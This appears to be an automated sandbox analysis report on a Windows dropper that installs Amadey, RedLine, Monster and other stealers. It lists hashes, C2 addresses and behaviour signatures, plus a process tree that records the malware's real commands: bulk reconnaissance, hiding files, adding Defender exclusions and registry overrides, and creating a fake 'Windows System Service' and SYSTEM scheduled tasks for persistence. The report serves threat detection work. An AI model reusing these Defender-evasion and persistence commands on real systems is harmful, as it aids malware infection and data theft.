Analysis

  • max time kernel
    142s
  • max time network
    149s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240611-en
  • resource tags

    arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    21-06-2024 00:25

General

  • Target

    d868becc66a066ad30691b268b4f0289585f2be543f4066c57c1d3bf8e589a19.exe

  • Size

    1.8MB

  • MD5

    3cc49f14ef0ef9ea942740dd6cff1536

  • SHA1

    a4d4cac4fe01f027caeccb322a4f71a5b03abdd9

  • SHA256

    d868becc66a066ad30691b268b4f0289585f2be543f4066c57c1d3bf8e589a19

  • SHA512

    d529316301278a361aa5c67c1ab3899730ad14a10d748cca30ca55146a83f8b9294f89c9c811ea4c234388349dab5c4f5314ebbddd9e818287d388b4cb286309

  • SSDEEP

    49152:Xs7n4oF6YIFLIi2F8qZRhgWh7ehHvAayeuB8meXBkCQoBC:2HFHIF52C/W9u4mu+mwzQ

Malware Config

Extracted

Family

amadey

Version

8254624243

Botnet

e76b71

C2

http://77.91.77.81

Attributes
  • install_dir

    8254624243

  • install_file

    axplong.exe

  • strings_key

    90049e51fabf09df0d6748e0b271922e

  • url_paths

    /Kiru9gu/index.php

rc4.plain

Extracted

Family

redline

Botnet

newbild

C2

185.215.113.67:40960

Extracted

Family

redline

Botnet

@LOGSCLOUDYT_BOT

C2

185.172.128.33:8970

Extracted

Family

redline

Botnet

LiveTraffic

C2

4.185.27.237:13528

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detects Monster Stealer. 1 IoCs
  • Exela Stealer

    Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.

  • Monster

    Monster is a Golang stealer that was discovered in 2024.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 5 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 26 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 43 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Power Settings 1 TTPs 13 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 20 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 19 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Detects Pyinstaller 1 IoCs
  • Embeds OpenSSL 1 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 9 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d868becc66a066ad30691b268b4f0289585f2be543f4066c57c1d3bf8e589a19.exe
    "C:\Users\Admin\AppData\Local\Temp\d868becc66a066ad30691b268b4f0289585f2be543f4066c57c1d3bf8e589a19.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:5076
    • C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
      "C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4332
      • C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe
        "C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1224
        • C:\Users\Admin\AppData\Local\Temp\onefile_1224_133634031569620868\stub.exe
          "C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2004
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "ver"
            5⤵
              PID:4024
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3388
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic csproduct get uuid
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2024
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4908
              • C:\Windows\system32\tasklist.exe
                tasklist
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:3024
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
              5⤵
              • Hide Artifacts: Hidden Files and Directories
              • Suspicious use of WriteProcessMemory
              PID:3356
              • C:\Windows\system32\attrib.exe
                attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
                6⤵
                • Views/modifies file attributes
                PID:4792
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
              5⤵
                PID:1228
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3660
                • C:\Windows\system32\taskkill.exe
                  taskkill /F /IM chrome.exe
                  6⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4744
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1600
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  6⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2124
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2308
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe Get-Clipboard
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4120
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "chcp"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1444
                • C:\Windows\system32\chcp.com
                  chcp
                  6⤵
                    PID:5116
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "chcp"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4156
                  • C:\Windows\system32\chcp.com
                    chcp
                    6⤵
                      PID:2040
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:336
                    • C:\Windows\system32\systeminfo.exe
                      systeminfo
                      6⤵
                      • Gathers system information
                      PID:4048
                    • C:\Windows\system32\HOSTNAME.EXE
                      hostname
                      6⤵
                        PID:1748
                      • C:\Windows\System32\Wbem\WMIC.exe
                        wmic logicaldisk get caption,description,providername
                        6⤵
                        • Collects information from the system
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3172
                      • C:\Windows\system32\net.exe
                        net user
                        6⤵
                          PID:4868
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 user
                            7⤵
                              PID:2316
                          • C:\Windows\system32\query.exe
                            query user
                            6⤵
                              PID:688
                              • C:\Windows\system32\quser.exe
                                "C:\Windows\system32\quser.exe"
                                7⤵
                                  PID:1208
                              • C:\Windows\system32\net.exe
                                net localgroup
                                6⤵
                                  PID:4368
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 localgroup
                                    7⤵
                                      PID:2560
                                  • C:\Windows\system32\net.exe
                                    net localgroup administrators
                                    6⤵
                                      PID:3804
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 localgroup administrators
                                        7⤵
                                          PID:2272
                                      • C:\Windows\system32\net.exe
                                        net user guest
                                        6⤵
                                          PID:2172
                                          • C:\Windows\system32\net1.exe
                                            C:\Windows\system32\net1 user guest
                                            7⤵
                                              PID:2588
                                          • C:\Windows\system32\net.exe
                                            net user administrator
                                            6⤵
                                              PID:3372
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 user administrator
                                                7⤵
                                                  PID:2612
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic startup get caption,command
                                                6⤵
                                                  PID:4164
                                                • C:\Windows\system32\tasklist.exe
                                                  tasklist /svc
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  PID:3152
                                                • C:\Windows\system32\ipconfig.exe
                                                  ipconfig /all
                                                  6⤵
                                                  • Gathers network information
                                                  PID:4836
                                                • C:\Windows\system32\ROUTE.EXE
                                                  route print
                                                  6⤵
                                                    PID:3200
                                                  • C:\Windows\system32\ARP.EXE
                                                    arp -a
                                                    6⤵
                                                      PID:4616
                                                    • C:\Windows\system32\NETSTAT.EXE
                                                      netstat -ano
                                                      6⤵
                                                      • Gathers network information
                                                      PID:4868
                                                    • C:\Windows\system32\sc.exe
                                                      sc query type= service state= all
                                                      6⤵
                                                      • Launches sc.exe
                                                      PID:1084
                                                    • C:\Windows\system32\netsh.exe
                                                      netsh firewall show state
                                                      6⤵
                                                      • Modifies Windows Firewall
                                                      • Event Triggered Execution: Netsh Helper DLL
                                                      PID:1208
                                                    • C:\Windows\system32\netsh.exe
                                                      netsh firewall show config
                                                      6⤵
                                                      • Modifies Windows Firewall
                                                      • Event Triggered Execution: Netsh Helper DLL
                                                      PID:3000
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                                    5⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:4076
                                                    • C:\Windows\system32\netsh.exe
                                                      netsh wlan show profiles
                                                      6⤵
                                                      • Event Triggered Execution: Netsh Helper DLL
                                                      PID:4616
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                    5⤵
                                                      PID:4328
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic csproduct get uuid
                                                        6⤵
                                                          PID:3524
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                        5⤵
                                                          PID:3740
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic csproduct get uuid
                                                            6⤵
                                                              PID:4900
                                                      • C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:3788
                                                      • C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:1884
                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                          4⤵
                                                            PID:3488
                                                            • C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
                                                              "C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3120
                                                            • C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
                                                              "C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Modifies system certificate store
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:3232
                                                        • C:\Users\Admin\AppData\Local\Temp\1000025001\deep.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\1000025001\deep.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          PID:4420
                                                          • C:\Users\Admin\AppData\Local\Temp\da_protected.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\da_protected.exe"
                                                            4⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Checks whether UAC is enabled
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            PID:4832
                                                            • C:\Users\Admin\AppData\Local\Temp\adwjhn.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\adwjhn.exe"
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:228
                                                              • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                setup.exe
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:3992
                                                                • C:\Users\Admin\AppData\Local\Temp\setup-eb3cdcda5504c90d\setup.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\setup-eb3cdcda5504c90d\setup.exe"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in System32 directory
                                                                  PID:2612
                                                                  • C:\Windows\system32\winsvc.exe
                                                                    "C:\Windows\system32\winsvc.exe" "C:\Users\Admin\AppData\Local\Temp\setup-eb3cdcda5504c90d\setup.exe"
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    PID:2324
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "create" "winsvc" "type=own" "start=auto" "error=ignore" "binPath=\"C:\Windows\system32\winsvc.exe\"" "DisplayName=\"Windows System Service\""
                                                                      9⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      PID:1072
                                                                      • C:\Windows\system32\sc.exe
                                                                        "C:\Windows\system32\sc.exe" create winsvc type=own start=auto error=ignore binPath=C:\Windows\system32\winsvc.exe "DisplayName=Windows System Service"
                                                                        10⤵
                                                                        • Launches sc.exe
                                                                        PID:5084
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "failure" "winsvc" "reset=0" "actions=restart/0/restart/0/restart/0"
                                                                      9⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      PID:1228
                                                                      • C:\Windows\system32\sc.exe
                                                                        "C:\Windows\system32\sc.exe" failure winsvc reset=0 actions=restart/0/restart/0/restart/0
                                                                        10⤵
                                                                        • Launches sc.exe
                                                                        PID:1848
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "description" "winsvc" "\"Windows System Service is the main system supervision service.\""
                                                                      9⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      PID:2868
                                                                      • C:\Windows\system32\sc.exe
                                                                        "C:\Windows\system32\sc.exe" description winsvc "Windows System Service is the main system supervision service."
                                                                        10⤵
                                                                        • Launches sc.exe
                                                                        PID:2368
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "start" "winsvc"
                                                                      9⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      PID:1400
                                                                      • C:\Windows\system32\sc.exe
                                                                        "C:\Windows\system32\sc.exe" start winsvc
                                                                        10⤵
                                                                        • Launches sc.exe
                                                                        PID:1656
                                                        • C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:2748
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            4⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:5008
                                                        • C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          PID:4388
                                                        • C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3088
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                            4⤵
                                                              PID:3540
                                                          • C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Drops file in Windows directory
                                                            PID:2868
                                                            • C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
                                                              4⤵
                                                              • Executes dropped EXE
                                                              PID:1200
                                                              • C:\Users\Admin\AppData\Local\Temp\1000005001\setup.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1000005001\setup.exe"
                                                                5⤵
                                                                • Executes dropped EXE
                                                                PID:3576
                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC98A.tmp\Install.exe
                                                                  .\Install.exe
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  PID:3304
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC29.tmp\Install.exe
                                                                    .\Install.exe /qNYINdidTISp "385119" /S
                                                                    7⤵
                                                                    • Checks BIOS information in registry
                                                                    • Executes dropped EXE
                                                                    • Enumerates system info in registry
                                                                    PID:4816
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                      8⤵
                                                                        PID:3580
                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                          9⤵
                                                                            PID:256
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                              10⤵
                                                                                PID:4648
                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                  11⤵
                                                                                    PID:4172
                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                9⤵
                                                                                  PID:4076
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                    10⤵
                                                                                      PID:3228
                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                        11⤵
                                                                                          PID:3784
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                      9⤵
                                                                                        PID:4444
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                          10⤵
                                                                                            PID:1320
                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                              11⤵
                                                                                                PID:2252
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                            9⤵
                                                                                              PID:3860
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                10⤵
                                                                                                  PID:3388
                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                    11⤵
                                                                                                      PID:1016
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                  9⤵
                                                                                                    PID:4172
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                      10⤵
                                                                                                        PID:4648
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                          11⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:1612
                                                                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                            12⤵
                                                                                                              PID:4764
                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                      8⤵
                                                                                                        PID:3848
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          9⤵
                                                                                                            PID:1320
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                            9⤵
                                                                                                              PID:1508
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                10⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:1700
                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                  11⤵
                                                                                                                    PID:1692
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /CREATE /TN "bRfJDuKmNsszhfPRJj" /SC once /ST 00:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSCC29.tmp\Install.exe\" oU /lqjdidfu 385119 /S" /V1 /F
                                                                                                              8⤵
                                                                                                              • Drops file in Windows directory
                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                              PID:3228
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000006001\FirstZ.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\1000006001\FirstZ.exe"
                                                                                                        5⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Drops file in System32 directory
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        PID:2268
                                                                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                          6⤵
